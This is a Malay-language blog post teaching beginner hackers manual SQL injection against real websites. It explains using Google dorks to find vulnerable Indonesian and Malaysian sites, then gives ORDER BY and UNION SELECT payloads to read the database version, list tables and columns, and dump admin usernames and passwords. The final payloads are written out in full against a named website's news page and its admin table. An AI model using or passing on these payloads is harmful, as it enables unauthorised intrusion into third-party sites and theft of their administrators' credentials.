harini sya nak ajar kepada newbie hacker.
cara manually.
selalu guna havij kan...
ni manually..
kela banyak bersabar..
hehehehe
ok..kita mulakan.
cara hack guna sql injection
1st anda perlu tahu dan apal kegunaan simbol2 ini.
' -
ok++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1st step adalah. gunakan dork google untuk mencari website yang VuLNERABLE.
caranya begini.
bukak www.google.com dan search unrl:com.id
ok ini untuk website indonesia. jika malaysia camni. unrl:com.my
2nd step anda bukak ke website yang anda pilih td. dan cari dimana ada error. jika ada.. maknnye boleh la diproses. hehehe...
ok boleh tgk gambar.
yang mana id-13 tu ada error. maknanya boleh diinject.
seterusnya.
3rd step gunakan order by
buang tanda ' dan type order by 1,2,3,4,5,6,7,8
jika ada error lagi maknenye boleh diteruskan
Tgk gambar ada error di order by 9
maknanya die dah xde dah 10,11,12
maka website ni boleh lah diteruskan untuk inject.
4rd step kita gunakan cara -no id union select 1,2,3,4,5,6,7,8--
tgk gambar lagi ye.. bagi mudah paham.
sekarang.. kita kene gantikan yang mane td vurneble td kepada @@version untuk tgk version jadi die akan begini.
-no id union select 1,2,3,@@version,5,6,7,8--
kelima.. kita kene cari table name dan juga database.
kene la tukar lagi ke @@version kepada group_concat(table_name) dan tambah perkataan from information_schema.tables--
tgk gambar
keenam
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from
information_schema.columns where table_schema=database()--
terakhir
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--
dan database akan keluar, tu la sql injection.
No comments:
Post a Comment